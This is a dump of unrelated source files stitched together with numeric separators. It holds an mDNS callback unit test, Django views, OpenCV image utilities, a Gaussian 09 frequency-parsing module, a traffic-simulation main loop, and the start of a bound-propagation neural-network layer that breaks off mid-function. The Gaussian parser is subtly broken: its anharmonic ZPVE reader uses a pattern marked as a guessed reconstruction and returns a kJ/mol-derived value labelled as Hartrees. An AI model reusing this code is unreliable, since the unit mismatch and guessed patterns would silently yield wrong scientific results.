"LocalPostgresDatabaseSource",
)
| 3,740 | 1,069 |
#!/usr/bin/env python
# Copyright 2017 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mock import MagicMock
from nmoscommon.mdns.mdnsCallbackHandler import MDNSAdvertisementCallbackHandler
class TestMDNSCallbackHandler(unittest.TestCase):
    """Checks that MDNSAdvertisementCallbackHandler invokes the user callback
    with a dict describing the advertisement and the event that occurred."""

    def setUp(self):
        self.callback = MagicMock()
        self.name = "testName"
        self.regtype = "_nmos-test._tcp"
        # BUGFIX: was `8080,` — the stray trailing comma made the port a
        # 1-tuple instead of an int.  (A dead `self.dut = MagicMock()` that
        # was immediately overwritten below has also been removed.)
        self.port = 8080
        self.txtRecord = {}
        self.dut = MDNSAdvertisementCallbackHandler(
            self.callback,
            self.regtype,
            self.name,
            self.port,
            self.txtRecord
        )

    def build_expected(self, action):
        """Return the dict the callback is expected to receive for *action*."""
        return {
            "action": action,
            "name": self.name,
            "regtype": self.regtype,
            "port": self.port,
            "txtRecord": self.txtRecord
        }

    def check_callback_test(self, action):
        """Assert the most recent callback call carried the expected dict."""
        argv, kwargs = self.callback.call_args
        expected = self.build_expected(action)
        actual = argv[0]
        self.assertDictEqual(actual, expected)

    def test_collision(self):
        self.dut.entryCollision()
        self.check_callback_test("collision")

    def test_failed(self):
        self.dut.entryFailed()
        self.check_callback_test("failed")

    def test_established(self):
        self.dut.entryEstablished()
        self.check_callback_test("established")
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
| 2,029 | 603 |
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404, render

from .forms import PostForm
from .models import Post
@login_required
def add_post_view(request):
    """Show the add-post form; on a valid POST save the post for the
    logged-in user and present a fresh empty form.

    BUGFIX: ``form`` was only assigned on the POST path, so a plain GET
    raised NameError; an unbound form is now supplied for GET requests and
    an invalid POST re-renders the bound form so its errors are shown.
    NOTE(review): consider redirecting after a successful save
    (post/redirect/get) so a browser refresh cannot resubmit — confirm
    against the project's URL names.
    """
    if request.method == "POST":
        form = PostForm(request.POST, request.FILES)
        if form.is_valid():
            obj = form.save(commit=False)
            obj.user = request.user
            obj.save()
            # Successful save: present a fresh, empty form.
            form = PostForm()
    else:
        form = PostForm()
    template_name = "posts/add_post.html"
    context = {
        "form": form
    }
    return render(request, template_name, context)
def display_posts_view(request):
    """Render the full list of posts."""
    return render(
        request,
        "posts/display_posts.html",
        {"posts": Post.objects.all()},
    )
def detail_post_view(request, slug):
    """Show a single post looked up by its slug.

    BUGFIX: a direct ``Post.objects.get`` raised ``Post.DoesNotExist``
    (HTTP 500) for unknown slugs; ``get_object_or_404`` turns that into a
    proper 404 response.
    """
    post = get_object_or_404(Post, slug=slug)
    template_name = "posts/detail_post.html"
    context = {
        "post": post
    }
    return render(request, template_name, context)
| 882 | 308 |
"""
Utilities - CVPRO
BY: MOHAK BAJAJ
CODING HEAVEN
"""
import math
import time
import logging
import cv2
import numpy as np
import copy
def stackImages(_imgList, cols, scale):
    """
    Stack Images together to display in a single window
    :param _imgList: list of images to stack
    :param cols: the num of img in a row
    :param scale: resize factor (>1 enlarges, <1 shrinks)
    :return: Stacked Image
    """
    imgList = copy.deepcopy(_imgList)
    # Pad the list with blank frames so it fills a complete cols x rows grid;
    # OpenCV's hstack/vstack require every cell to be present.
    totalImages = len(imgList)
    rows = math.ceil(totalImages / cols)
    padCount = cols * rows - totalImages
    height, width = imgList[0].shape[0], imgList[0].shape[1]
    imgBlank = np.zeros((height, width, 3), np.uint8)
    imgList += [imgBlank] * padCount
    # Rescale everything and force 3 channels so stacking shapes agree.
    for idx in range(cols * rows):
        imgList[idx] = cv2.resize(imgList[idx], (0, 0), None, scale, scale)
        if len(imgList[idx].shape) == 2:
            imgList[idx] = cv2.cvtColor(imgList[idx], cv2.COLOR_GRAY2BGR)
    # Assemble one horizontal strip per row, then stack the strips.
    stripList = []
    for r in range(rows):
        stripList.append(np.hstack(imgList[r * cols:(r + 1) * cols]))
    return np.vstack(stripList)
def cornerRect(img, bbox, l=30, t=5, rt=1,
               colorR=(255, 0, 255), colorC=(0, 255, 0)):
    """
    Draw a rectangle with emphasized corner marks.
    :param img: Image to draw on.
    :param bbox: Bounding box [x, y, w, h]
    :param l: length of the corner line
    :param t: thickness of the corner line
    :param rt: thickness of the rectangle (0 = no rectangle)
    :param colorR: Color of the Rectangle
    :param colorC: Color of the Corners
    :return: the image with the rectangle/corners drawn in place
    """
    x, y, w, h = bbox
    x1, y1 = x + w, y + h
    if rt != 0:
        cv2.rectangle(img, bbox, colorR, rt)
    # Each entry: (corner point, end of horizontal arm, end of vertical arm).
    corners = (
        ((x, y), (x + l, y), (x, y + l)),        # top left
        ((x1, y), (x1 - l, y), (x1, y + l)),     # top right
        ((x, y1), (x + l, y1), (x, y1 - l)),     # bottom left
        ((x1, y1), (x1 - l, y1), (x1, y1 - l)),  # bottom right
    )
    for corner, hEnd, vEnd in corners:
        cv2.line(img, corner, hEnd, colorC, t)
        cv2.line(img, corner, vEnd, colorC, t)
    return img
def findContours(img, imgPre, minArea=1000, sort=True, filter=0, drawCon=True, c=(255, 0, 0)):
    """
    Finds Contours in an image
    :param img: Image on which we want to draw
    :param imgPre: Image on which we want to find contours
    :param minArea: Minimum Area to detect as valid contour
    :param sort: True will sort the contours by area (biggest first)
    :param filter: Filters based on the corner points e.g. 4 = Rectangle or square (0 = keep all)
    :param drawCon: draw contours boolean
    :return: Found contours with [contours, Area, BoundingBox, Center]
    """
    imgContours = img.copy()
    conFound = []
    contours, hierarchy = cv2.findContours(
        imgPre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
    for contour in contours:
        area = cv2.contourArea(contour)
        if area <= minArea:
            continue
        # Approximate the polygon so the corner count can be filtered on.
        peri = cv2.arcLength(contour, True)
        approx = cv2.approxPolyDP(contour, 0.02 * peri, True)
        if filter != 0 and len(approx) != filter:
            continue
        if drawCon:
            cv2.drawContours(imgContours, contour, -1, c, 3)
        x, y, w, h = cv2.boundingRect(approx)
        cx, cy = x + (w // 2), y + (h // 2)
        cv2.rectangle(imgContours, (x, y), (x + w, y + h), c, 2)
        cv2.circle(imgContours, (cx, cy), 5, c, cv2.FILLED)
        conFound.append({"cnt": contour, "area": area,
                         "bbox": [x, y, w, h], "center": [cx, cy]})
    if sort:
        conFound.sort(key=lambda item: item["area"], reverse=True)
    return imgContours, conFound
def overlayPNG(imgBack, imgFront, pos=[0, 0]):
    """Overlay a BGRA *imgFront* onto BGR *imgBack* using the alpha channel.

    NOTE(review): assumes imgFront fits entirely inside imgBack at *pos*;
    out-of-range positions will raise — confirm callers clip beforehand.
    """
    hf, wf = imgFront.shape[0], imgFront.shape[1]
    hb, wb, cb = imgBack.shape
    px, py = pos[0], pos[1]
    # The alpha (last) channel of the foreground selects the pixels to paste.
    *_, alpha = cv2.split(imgFront)
    alphaBGRA = cv2.cvtColor(alpha, cv2.COLOR_GRAY2BGRA)
    alphaBGR = cv2.cvtColor(alpha, cv2.COLOR_GRAY2BGR)
    frontMasked = cv2.cvtColor(cv2.bitwise_and(imgFront, alphaBGRA), cv2.COLOR_BGRA2BGR)
    # Two full-size canvases: one carries the foreground pixels, the other
    # carves a matching hole out of the background.
    pasteCanvas = np.zeros((hb, wb, cb), np.uint8)
    pasteCanvas[py:hf + py, px:wf + px, :] = frontMasked
    holeCanvas = np.ones((hb, wb, cb), np.uint8) * 255
    holeCanvas[py:hf + py, px:wf + px, :] = cv2.bitwise_not(alphaBGR)
    imgBack = cv2.bitwise_and(imgBack, holeCanvas)
    imgBack = cv2.bitwise_or(imgBack, pasteCanvas)
    return imgBack
def rotateImage(img, angle, scale=1):
    """Rotate *img* by *angle* degrees about its center (canvas size unchanged)."""
    h, w = img.shape[:2]
    matrix = cv2.getRotationMatrix2D(center=(w / 2, h / 2), angle=angle, scale=scale)
    return cv2.warpAffine(src=img, M=matrix, dsize=(w, h))
class ColorFinder:
    """
    Finds color in an image based on hsv values
    Can run as stand alone to find relevant hsv values
    """

    def __init__(self, trackBar=False):
        # trackBar: when True, open an OpenCV trackbar window for live HSV tuning.
        self.trackBar = trackBar
        if self.trackBar:
            self.initTrackbars()

    def empty(self, a):
        # No-op callback required by cv2.createTrackbar.
        pass

    def initTrackbars(self):
        """
        To initialize Trackbars. Need to run only once.
        """
        cv2.namedWindow("TrackBars")
        cv2.resizeWindow("TrackBars", 640, 240)
        cv2.createTrackbar("Hue Min", "TrackBars", 0, 179, self.empty)
        cv2.createTrackbar("Hue Max", "TrackBars", 179, 179, self.empty)
        cv2.createTrackbar("Sat Min", "TrackBars", 0, 255, self.empty)
        cv2.createTrackbar("Sat Max", "TrackBars", 255, 255, self.empty)
        cv2.createTrackbar("Val Min", "TrackBars", 0, 255, self.empty)
        cv2.createTrackbar("Val Max", "TrackBars", 255, 255, self.empty)

    def getTrackbarValues(self):
        """
        Gets the trackbar values in runtime
        :return: hsv values from the trackbar window
        """
        hmin = cv2.getTrackbarPos("Hue Min", "TrackBars")
        smin = cv2.getTrackbarPos("Sat Min", "TrackBars")
        vmin = cv2.getTrackbarPos("Val Min", "TrackBars")
        hmax = cv2.getTrackbarPos("Hue Max", "TrackBars")
        smax = cv2.getTrackbarPos("Sat Max", "TrackBars")
        vmax = cv2.getTrackbarPos("Val Max", "TrackBars")
        hsvVals = {"hmin": hmin, "smin": smin, "vmin": vmin,
                   "hmax": hmax, "smax": smax, "vmax": vmax}
        print(hsvVals)
        return hsvVals

    def update(self, img, myColor=None):
        """
        :param img: Image in which color needs to be found
        :param myColor: a color name ('red'/'green'/'blue'), an hsv dict,
            or None (trackbar values are used when trackBar is enabled)
        :return: (mask) bw image with white regions where color is detected
                 (imgColor) colored image only showing regions detected
        """
        # BUGFIX: was `imgColor = [],` — the trailing comma made imgColor a
        # 1-tuple `([],)` whenever no color could be resolved.
        imgColor = []
        mask = []
        if self.trackBar:
            myColor = self.getTrackbarValues()
        if isinstance(myColor, str):
            myColor = self.getColorHSV(myColor)
        if myColor is not None:
            imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
            lower = np.array(
                [myColor['hmin'], myColor['smin'], myColor['vmin']])
            upper = np.array(
                [myColor['hmax'], myColor['smax'], myColor['vmax']])
            mask = cv2.inRange(imgHSV, lower, upper)
            imgColor = cv2.bitwise_and(img, img, mask=mask)
        return imgColor, mask

    def getColorHSV(self, myColor):
        """Return a preset hsv-range dict for 'red'/'green'/'blue', else None."""
        if myColor == 'red':
            output = {'hmin': 146, 'smin': 141, 'vmin': 77,
                      'hmax': 179, 'smax': 255, 'vmax': 255}
        elif myColor == 'green':
            output = {'hmin': 44, 'smin': 79, 'vmin': 111,
                      'hmax': 79, 'smax': 255, 'vmax': 255}
        elif myColor == 'blue':
            output = {'hmin': 103, 'smin': 68, 'vmin': 130,
                      'hmax': 128, 'smax': 255, 'vmax': 255}
        else:
            output = None
            logging.warning("Color Not Defined")
            logging.warning("Available colors: red, green, blue ")
        return output
class FPS:
    """
    Helps in finding Frames Per Second and display on an OpenCV Image
    """

    def __init__(self):
        # Timestamp of the previous update; seeds the first frame-time delta.
        self.pTime = time.time()

    def update(self, img=None, pos=(20, 50), color=(255, 0, 0), scale=3, thickness=3):
        """
        Update the frame rate.
        :param img: Image to display on, can be left blank if only fps value required
        :param pos: Position on the FPS on the image
        :param color: Color of the FPS Value displayed
        :param scale: Scale of the FPS Value displayed
        :param thickness: Thickness of the FPS Value displayed
        :return: fps (and the annotated image when *img* is given);
                 0 if no measurable time has elapsed since the last call
        """
        cTime = time.time()
        try:
            fps = 1 / (cTime - self.pTime)
        except ZeroDivisionError:
            # BUGFIX: the original bare `except:` also swallowed drawing
            # errors; only the two-calls-in-one-clock-tick case returns 0.
            return 0
        self.pTime = cTime
        if img is None:
            return fps
        cv2.putText(img, f'FPS: {int(fps)}', pos, cv2.FONT_HERSHEY_PLAIN,
                    scale, color, thickness)
        return fps, img
class LivePlot:
    """
    Live Plotting Graphs
    Can be used for PID tuning, Simple Trigonometric Plots, etc.

    Keeps a rolling window of roughly the last 100 samples and redraws the
    whole plot image on each `update` call, throttled by `interval`.
    """

    def __init__(self, w=640, h=480, yLimit=[0, 100],
                 interval=0.001, invert=False, char=' '):
        self.yLimit = yLimit      # [min, max] of the plotted value
        self.w = w                # plot width in pixels
        self.h = h                # plot height in pixels
        self.invert = invert     # True -> larger values drawn higher on screen
        self.interval = interval  # minimum seconds between redraws
        self.char = char[0]       # single label character shown bottom-right
        self.imgPlot = np.zeros((self.h, self.w, 3), np.uint8)
        # NOTE(review): this light-grey fill is immediately painted over by
        # the filled black rectangle below, so it has no visible effect here.
        self.imgPlot[:] = 225, 225, 225
        cv2.rectangle(self.imgPlot, (0, 0),
                      (self.w, self.h),
                      (0, 0, 0), cv2.FILLED)
        self.xP = 0
        self.yP = 0
        self.yList = []                          # rolling window of plotted y pixel rows
        self.xList = [x for x in range(0, 100)]  # fixed x sample indices
        self.ptime = 0                           # timestamp of the last redraw

    def update(self, y):
        # y: the new sample value (in yLimit units).
        # Returns the plot image; it is redrawn only if `interval` has elapsed.
        if time.time() - self.ptime > self.interval:
            # Refresh
            self.imgPlot[:] = 225, 225, 225
            # Draw Static Parts
            self.drawBackground()
            # Draw the text value
            cv2.putText(self.imgPlot, str(y),
                        (self.w - (125), 50), cv2.FONT_HERSHEY_PLAIN,
                        3, (150, 150, 150), 3)
            # Map the sample to a pixel row; `invert` flips the vertical axis.
            if self.invert:
                self.yP = int(np.interp(y, self.yLimit,
                                        [self.h, 0]))
            else:
                self.yP = int(np.interp(y, self.yLimit,
                                        [0, self.h]))
            self.yList.append(self.yP)
            # Cap the rolling window at 100 samples.
            if len(self.yList) == 100:
                self.yList.pop(0)
            # Connect consecutive samples with line segments.
            for i in range(0, len(self.yList)):
                if i < 2:
                    pass
                else:
                    cv2.line(self.imgPlot, (int((self.xList[i - 1] * (self.w // 100))) - (self.w // 10),
                                            self.yList[i - 1]),
                             (int((self.xList[i] * (self.w // 100)) - (self.w // 10)),
                              self.yList[i]), (255, 0, 255), 2)
            self.ptime = time.time()
        return self.imgPlot

    def drawBackground(self):
        # Repaint the static decorations: canvas, center line, grid, labels.
        # Draw Background Canvas
        cv2.rectangle(self.imgPlot, (0, 0),
                      (self.w, self.h),
                      (0, 0, 0), cv2.FILLED)
        # Center Line
        cv2.line(self.imgPlot, (0, self.h // 2),
                 (self.w, self.h // 2), (150, 150, 150), 2)
        # Draw Grid Lines
        for x in range(0, self.w, 50):
            cv2.line(self.imgPlot, (x, 0), (x, self.h),
                     (50, 50, 50), 1)
        for y in range(0, self.h, 50):
            cv2.line(self.imgPlot, (0, y), (self.w, y),
                     (50, 50, 50), 1)
            # Y Label: value corresponding to this grid row
            # (assumes yLimit[0] == 0 — TODO confirm).
            cv2.putText(self.imgPlot, f'{int((self.h - y) * (self.yLimit[1] / self.h))}',
                        (10, y), cv2.FONT_HERSHEY_PLAIN,
                        1, (150, 150, 150), 1)
        # Unit/label character in the bottom-right corner.
        cv2.putText(self.imgPlot, self.char,
                    (self.w - 100, self.h - 25), cv2.FONT_HERSHEY_PLAIN,
                    5, (150, 150, 150), 5)
def putTextRect(img, text, pos, scale=3, thickness=3, colorT=(255, 255, 255),
                colorR=(255, 0, 255), font=cv2.FONT_HERSHEY_PLAIN,
                offset=10, border=None, colorB=(0, 255, 0)):
    """
    Creates Text with Rectangle Background
    :param img: Image to put text rect on
    :param text: Text inside the rect
    :param pos: Starting position of the rect x1,y1 (text baseline origin)
    :param scale: Scale of the text
    :param thickness: Thickness of the text
    :param colorT: Color of the Text
    :param colorR: Color of the Rectangle
    :param font: Font used. Must be cv2.FONT....
    :param offset: Clearance around the text
    :param border: Outline around the rect (None = no outline)
    :param colorB: Color of the outline
    :return: image, rect (x1,y1,x2,y2)
    """
    ox, oy = pos
    (textW, textH), _ = cv2.getTextSize(text, font, scale, thickness)
    # Rectangle padded by `offset` on every side of the rendered text.
    left, bottom = ox - offset, oy + offset
    right, top = ox + textW + offset, oy - textH - offset
    cv2.rectangle(img, (left, bottom), (right, top), colorR, cv2.FILLED)
    if border is not None:
        cv2.rectangle(img, (left, bottom), (right, top), colorB, border)
    cv2.putText(img, text, (ox, oy), font, scale, colorT, thickness)
    return img, [left, top, right, bottom]
| 14,019 | 5,329 |
"""
Library of functions to retrieve frequency information from a Gaussian 09e output file.
Frequencies currently supported:
(1) Harmonic Vibrational Frequencies
(2) Harmonic Zero-Point Vibrational Energy
"""
__authors__ = "Kevin Moore, Andreas Copan"
__updated__ = "2019-01-15"
from ..rere import parse as repar
from ..rere import find as ref
from ..rere import pattern as rep
from ..rere import pattern_lib as relib
from ... import params
##### Series of functions to read the frequency information #####
def harm_vib_freqs_reader(output_string):
    """ Reads the harmonic vibrational frequencies from the output file.
        Returns the frequencies as a list of floats in cm-1.
    """
    harm_vib_freq_pattern = (
        'Frequencies --' +
        rep.one_or_more(relib.WHITESPACE) +
        rep.capturing(
            rep.one_or_more(relib.FLOAT +
                            rep.one_or_more(relib.WHITESPACE))
        )
    )
    # Obtain the frequencies for all degrees-of-freedom
    all_freqs = repar.list_float(harm_vib_freq_pattern, output_string)
    # Remove the zero frequencies
    vib_freqs = [freq for freq in all_freqs if freq != 0.0]
    # BUGFIX: a block of code pasted from another project (referencing the
    # undefined names `lines`, `io` and `nfreq`) used to sit here and raised
    # NameError before the return could be reached; it has been removed.
    return vib_freqs
def harm_zpve_reader(output_string):
    """ Reads the harmonic zero-point vibrational energy (ZPVE) from the output file.
        Returns the ZPVE as a float; in Hartrees.
    """
    # Matches e.g. "Zero-point correction=    0.051234 (Hartree/Particle)".
    # BUGFIX: the original pattern was missing a '+' before the trailing
    # literal (a SyntaxError) and returned an undefined name `harm_zpve`.
    harm_zpve_pattern = (
        'Zero-point correction=' +
        rep.one_or_more(relib.WHITESPACE) +
        rep.capturing(relib.FLOAT) +
        rep.one_or_more(relib.WHITESPACE) +
        r'\(Hartree/Particle\)'
    )
    # TODO(review): confirm repar.list_float is the right extraction helper
    # here (it is the one used by harm_vib_freqs_reader above).
    matches = repar.list_float(harm_zpve_pattern, output_string)
    harm_zpve = matches[0] if matches else None
    return harm_zpve
def anharm_zpve_reader(output_string):
    """ Reads the anharmonic zero-point vibrational energy (ZPVE) from the output file.
        Returns the ZPVE as a float; in Hartrees.
    """
    # Gaussian prints "ZPE(anh) = <float>D-02 KJ/mol" in the anharmonic
    # section.  BUGFIX: the original body used undefined bare names
    # (FLOAT, and D-02 — not even valid Python syntax) and returned an
    # undefined variable; the pattern is reconstructed here as a regex.
    # TODO(review): confirm the exact line format and whether a
    # kJ/mol -> Hartree conversion is required, against a real G09e output.
    anharm_zpve_pattern = (
        r'ZPE\(anh\)' +
        rep.one_or_more(relib.WHITESPACE) + '=' +
        rep.one_or_more(relib.WHITESPACE) +
        rep.capturing(relib.FLOAT) +
        'D-02' +
        rep.one_or_more(relib.WHITESPACE) +
        'KJ/mol'
    )
    matches = repar.list_float(anharm_zpve_pattern, output_string)
    # Apply the printed D-02 exponent to the captured mantissa.
    anharm_zpve = matches[0] * 1.0e-2 if matches else None
    return anharm_zpve
##### Dictionary of functions to read frequency information in the files #####

# Maps frequency job types to their reader implementations.
FREQUENCY_READERS = {
    params.FREQUENCY.HARM_FREQ: harm_vib_freqs_reader,
    # BUGFIX: the comma after this entry was missing, which is a SyntaxError.
    params.FREQUENCY.HARM_ZPVE: harm_zpve_reader,
    params.FREQUENCY.ANHARM_ZPVE: anharm_zpve_reader
}
#def gaussian_rotdists (lines):
# startkey = 'Quartic Centrifugal Distortion Constants Tau Prime'
# endkey = 'Asymmetric Top Reduction'
# lines = lines.splitlines()
# sline = io.get_line_number(startkey,lines=lines)
# if sline < 0:
# return ''
# lines = lines[sline+3:sline+9]
# distlines = []
# for line in lines:
# splitline = line.split()
# if splitline[0] == 'TauP':
# distlines.append('\t'.join(splitline[1:3]))
# else:
# break
# constants = '\n'.join(distlines).replace('D','e')
# return constants
#
#def gaussian_vibrot(lines):
# startkey = 'Vibro-Rot alpha Matrix (in cm^-1)'
# ndof = gaussian_nfreq(lines)
# lines = lines.splitlines()
# sline = io.get_line_number(startkey,lines=lines)
# if sline < 0:
# return ''
# lines = lines[sline+3:sline+3+ndof]
# for i in range(len(lines)):
# if ')' in lines[i]:
# lines[i] = lines[i].split(')')[1]
# if ndof < 2:
# lines[i] = '\t'.join(lines[i].split()[:-1])
# mat = '\n'.join(lines).split('---------------')[0]
# return mat
| 3,664 | 1,340 |
import time
import sys
from graphics import GraphApp, GraphWin, Text, Point, _root
from menu import MainMenu
from graphs import Graph, ShortestPaths
from maps import RoadMap
from cars import Car, CarShape, CarFactory
from gps import GPS
from info_window import InfoWindow, RoadInfoWindow
from collision import GridCollisionSystem, QuadTreeCollisionSystem
from latlon import LatLonConverter
from openstreetmap import query_roads_by_lat_lon, save_raw_json_map_data
def main():
    """Set up the simulation (map, cars, collision system, info windows)
    and run the main loop until `limit` simulated seconds have elapsed.

    Relies on the module-level windows (`window`, `secondary_window`,
    `road_info_window`, `frame`) and `main_menu` created in the
    `__main__` block below; also serves as the menu's "Restart" action.
    """
    # Reset every window to a clean state.
    window.addToParent()
    window.setBackground('white')
    window.clear()
    window.resetView()
    secondary_window.addToParent()
    secondary_window.setBackground('white')
    secondary_window.clear()
    road_info_window.setBackground('white')
    road_info_window.clear()
    # Build the road graph from the configured OpenStreetMap extract.
    config_data = main_menu.config_data
    map_data = config_data["map_data"]
    S = map_data["coords_south"]
    W = map_data["coords_west"]
    N = map_data["coords_north"]
    E = map_data["coords_east"]
    llc = LatLonConverter(window, S, W, N, E)
    graph = Graph()
    graph.load_open_street_map_data(map_data["filename"], llc)
    road_map = RoadMap(graph, window)
    road_map.draw()
    road_map.draw_road_names()
    gps = GPS(graph, road_map)
    # Create the requested number of cars; CarFactory fills both lists.
    cars = []
    car_shapes = []
    car_factory = CarFactory(window, gps, cars, car_shapes)
    num_cars = config_data["num_cars"]
    for _ in range(num_cars):
        car_factory.create()
    # collision_system = GridCollisionSystem(window, cars)
    collision_system = QuadTreeCollisionSystem(window, cars)
    # The info panel tracks one selected car, highlighted in yellow.
    info = InfoWindow(secondary_window)
    info.set_selected_car(cars[0])
    info.initialize_table()
    car_shapes[info.selected_car.index].shape.setFill("yellow")
    road_info = RoadInfoWindow(road_info_window)
    for car_shape in car_shapes:
        car_shape.draw()
    # initialize simulation variables
    simTime = 0.0    # simulated seconds elapsed
    limit = 10000    # stop after this much simulated time
    TICKS_PER_SECOND = 30
    TIME_PER_TICK = 1.0/TICKS_PER_SECOND
    nextLogicTick = TIME_PER_TICK
    lastFrameTime = time.time()
    lag = 0.0        # wall-clock time not yet consumed by logic ticks
    # Main Simulation Loop (fixed-timestep logic, free-running rendering)
    while simTime < limit:
        currentTime = time.time()
        elapsed = currentTime - lastFrameTime
        lastFrameTime = currentTime
        lag += elapsed
        simTime += elapsed
        # process events
        window.update()
        secondary_window.update()
        road_info_window.update()
        frame.update()
        last_pressed_key = (
            window.checkKey() or
            secondary_window.checkKey() or
            road_info_window.checkKey()
        )
        if last_pressed_key is not None:
            if last_pressed_key == "space":
                pause()
                # Reset the frame timer so paused time is not counted as lag.
                lastFrameTime = time.time()
            elif last_pressed_key == "p":
                window.zoomIn()
            elif last_pressed_key == "o":
                window.zoomOut()
            elif last_pressed_key == "d":
                # Debug: dump the roads currently visible in the viewport.
                print(road_map.get_roads_within_view())
        # A click in the map window selects a car, or failing that, a road.
        last_clicked_pt = window.checkMouse()
        if last_clicked_pt is not None:
            car_clicked = False
            map_obj_clicked = False
            for car_shape in car_shapes:
                if car_shape.clicked(last_clicked_pt):
                    # Un-highlight the previous selection, highlight the new one.
                    car_shapes[info.selected_car.index].shape.setFill("white")
                    info.set_selected_car(cars[car_shape.index])
                    car_shapes[info.selected_car.index].shape.setFill("yellow")
                    car_clicked = True
                    break
            if not car_clicked:
                nearby_object_ids = road_map.get_nearby_object_ids(last_clicked_pt.x, last_clicked_pt.y)
                for map_obj_id in nearby_object_ids:
                    map_obj = road_map.get_obj_by_id(map_obj_id)
                    if map_obj.clicked(last_clicked_pt):
                        # Pop the road-info window next to the click position.
                        relx, rely = window.getRelativeScreenPos(last_clicked_pt.x, last_clicked_pt.y)
                        road_info_window_options = {"place": {"relx": relx, "rely": rely}}
                        road_info_window.addToParent(road_info_window_options)
                        road_info.set_selected_item(map_obj)
                        map_obj_clicked = True
                        break
                if not map_obj_clicked:
                    road_info_window.forget()
        # Clicks in the info window are routed to its buttons.
        last_clicked_pt = secondary_window.checkMouse()
        if last_clicked_pt is not None:
            secondary_window.update()
            for button in info.buttons:
                button.clicked(last_clicked_pt)
            # NOTE(review): this `continue` skips the logic/render phases for
            # the frame after an info-window click — confirm it is intentional.
            continue
        # update simulation logic
        while lag > TIME_PER_TICK:
            collision_system.process_collisions(cars)
            for car in cars:
                car.move_towards_dest(TIME_PER_TICK)
                car_shape = car_shapes[car.index]
                car_shape.x = cars[car.index].x
                car_shape.y = cars[car.index].y
            collision_system.update_objects(cars)
            nextLogicTick += TIME_PER_TICK
            lag -= TIME_PER_TICK
        # render updates to window
        for car_shape in car_shapes:
            car_shape.render()
        info.update_table()
        if info.follow_car:
            window.centerScreenOnPoint(info.selected_car.x, info.selected_car.y)
        road_info.update_table()
        road_map.draw_route(info.selected_car, info.show_route)
        _root.update_idletasks()
    cleanup()
def pause():
    """Show a 'Paused' banner and block until space is pressed in any window."""
    cx, cy = window.getCenterScreenPoint()
    banner = Text(Point(cx, cy), 'Paused')
    banner.setSize(24)
    banner.draw(window)
    all_windows = (window, secondary_window, road_info_window)
    # Poll each window for a space keypress, keeping the GUIs responsive.
    while not any(w.checkKey() == "space" for w in all_windows):
        for w in all_windows:
            w.update()
    banner.undraw()
def cleanup():
    """Free resources, close every window and terminate the process."""
    for win in (window, secondary_window, road_info_window, frame):
        win.close()
    sys.exit()
if __name__ == '__main__':
    # Build the Tk application frame and the three drawing windows, then
    # hand control to the menu / simulation.
    frame = GraphApp("Traffic Simulation")
    window_options = {"pack": {"side": "left", "fill": "both", "expand": True}}
    window = GraphWin(
        "Map Window", 1280, 800, autoflush=False,
        new_window=False, master=frame.master, master_options=window_options
    )
    # Overlay windows: car info (docked top-right) and per-road info
    # (placed next to the click when a road is selected).
    secondary_window_options = {"place": {"relx": 1, "rely": 0, "anchor": "ne"}}
    secondary_window = GraphWin(
        "Info Window", 300, 400, autoflush=False, scrollable=False,
        new_window=False, master=frame.master, master_options=secondary_window_options
    )
    road_info_window = GraphWin(
        "Road Info Window", 300, 130, autoflush=False, scrollable=False,
        new_window=False, master=frame.master, master_options={}
    )
    hidden_windows = [secondary_window, road_info_window]
    main_menu = MainMenu(window, main, hidden_windows=hidden_windows)
    menu_options = {"Menu": main_menu.run, "Restart": main, "Exit": cleanup}
    frame.addMenu(menu_options)
    main()

# TODO
# AI so cars can change lanes without crashing and adjust route based on existing traffic conditions
# add ability for cars to change lanes
# create gui menu so that settings can be changed in the simulation (# of cars, lane closures, etc)
# increase # of cars that can be drawn on the screen at once to: 500 | 1000
# dynamically load additional map data when zooming out or moving camera
| 7,460 | 2,324 |
"""
这个文件修改自原文件,修改内容包括:
1. 删除quadratic algorithm的使用,因为还没想好该怎么用
2. 从原来的单扰动改为多扰动
"""
'''
>>> This file creates modules that can do forward, backward pass as well as bound propagation
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from abc import ABCMeta, abstractmethod
import numpy as np
from .linearize import linearize_relu, linearize_sigd, linearize_tanh, linearize_arctan
from .utility import reduced_m_bm, reduced_bm_bm, reduced_bv_bm, reduced_bm_bv, quad_bound_calc
class Layer(nn.Module, metaclass=ABCMeta):
    """Abstract base for modules that support both a forward pass and
    interval-bound propagation."""

    def __init__(self):
        super(Layer, self).__init__()

    @abstractmethod
    def forward(self, x):
        """Run the forward pass on input *x*."""
        raise NotImplementedError

    @abstractmethod
    def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps1 = None, ori_perturb_eps2 = None, first_layer = False):
        """Propagate the interval bounds through this layer.

        l, u: lower/upper input bounds, shape [batch_size, immediate_in_dim]
        W_list: transformation matrices introduced by previous layers,
            shape [batch_size, out_dim, in_dim]
        m1_list, m2_list: bias terms introduced by previous layers,
            shape [batch_size, in_dim]
        ori_perturb_norm, ori_perturb_eps1/eps2: the original perturbation
            description (default None)
        first_layer: whether this layer is the network's first layer
        """
        raise NotImplementedError
class FCLayer(Layer):
    """Fully-connected layer with interval bound propagation for two
    perturbation budgets (eps1 for the lower, eps2 for the upper bound)."""

    def __init__(self, in_features, out_features):
        super(FCLayer, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.layer = nn.Linear(in_features, out_features)

    def forward(self, x):
        return F.linear(x, self.layer.weight, self.layer.bias)

    def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps1 = None, ori_perturb_eps2 = None, first_layer = False):
        """Propagate [l, u] through the affine map.

        (The disabled quadratic-method bound code that used to sit here was
        removed; see the module-header note about dropping the quad path.)
        """
        if first_layer == True:
            # Dual-norm adjustment of the perturbation budgets (Hölder).
            primal_norm = ori_perturb_norm
            dual_norm = 1. / (1. - 1. / primal_norm)
